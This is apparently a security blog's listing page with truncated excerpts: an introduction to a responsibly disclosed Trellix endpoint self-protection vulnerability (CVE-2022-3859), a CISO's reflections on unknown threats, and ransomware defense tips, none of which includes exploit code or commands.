Attacking local self-protection mechanisms – a case study of CVE-2019-3613 and CVE-2022-3859 Introduction to Trellix CVE-2022-3859 On 29th November Trellix (formerly McAfee) released a security bulletin addressing an issue tracked as CVE-2022-3859 (https://kcm.trellix.com/corporate/index?page=content&id=SB10391), which I had discovered and responsibly disclosed a couple of months earlier. Its discovery was prompted by my earlier finding of the same nature, affecting the same product, three years before (CVE-2019-3613, https://kcm.trellix.com/corporate/index?page=content&id=SB10320). Since the official descriptions are rather general and cryptic, and both issues have now been addressed, I thought that sharing some of the technical details could be valuable for other techies interested in security solutions, system programming, or sample ideas for attacking software self-protection mechanisms. Self-protection mechanisms As early detection of malicious activity is critical to stopping incidents at an early stage, enterprise security solutions such as anti-virus agents and EDR sensors have for some time been equipped with additional self-protection mechanisms. Those mechanisms are built on top of the security controls already provided by the operating system, trying to

Jan 3, 2023
  • Incident response

CISO’s perspectives - The 4 recommendations to sleep without a worry

CISO’s perspectives - The 4 recommendations to sleep without a worry 1. Sleeping-well CISO: myth or reality? Considering the countless cyber threats out there, which threat keeps you up at night? This is THE one-billion-dollar question for CISOs today! People suppose we do not sleep well at night because of all the cybersecurity threats around us that target our business. It is certainly true that in the past three years there has been a massive increase in attacks against all types of organizations. Additionally, in the IT sector we are highly targeted because we supply products and services to customers. Yet I sleep much better than a couple of years ago: we have now consolidated our security and have years of experience protecting ourselves and our customers. Nevertheless, I must admit that what can wake me up at night is the "unknown", especially the unknown unknowns, as well described by Donald Rumsfeld. In cybersecurity there are threats that we know we know, and we protect against these threats (with mixed success sometimes). There are also elements that we know we don't know: for example, servers that didn't go through the standard registration process

Dec 14, 2022
  • Cyber threats

10 security tips to protect your organizations against ransomware

10 security tips to protect your organizations against ransomware The business of ransomware is flourishing, boosted by the anonymity of the attackers, the limited number of criminal cases being prosecuted, the automation of attack methods and huge profit for low risk. The groups behind ransomware are more and more powerful and operate like professional enterprises. They are pooling their forces, sharing knowledge and techniques, which directly widens the range of their targets and victims. All companies should consider this threat one of the most immediate and serious their organizations are facing. Understanding the ransomware threat Common patterns can be recognized in ransomware attacks. In many cases, the visible part of the attack is when an encrypting program is executed, making the file systems of workstations and servers unreadable. This stage is the last and visible one; in many cases the network has been compromised for days, weeks or months before. Standard antivirus software is not effective against customized malware and lets networks and computers be compromised through phishing or the exploitation of unpatched software vulnerabilities, or both in some cases. A ransomware attack usually has 3 stages: 1. The intrusion Once hackers have entered the


Subscribe to Cyber shield blogs to stay one step ahead of evolving threats

Receive expert‑curated threat intelligence discoveries, technical breakdowns, and proactive defense insights directly from the Atos Threat Research Center(TRC).
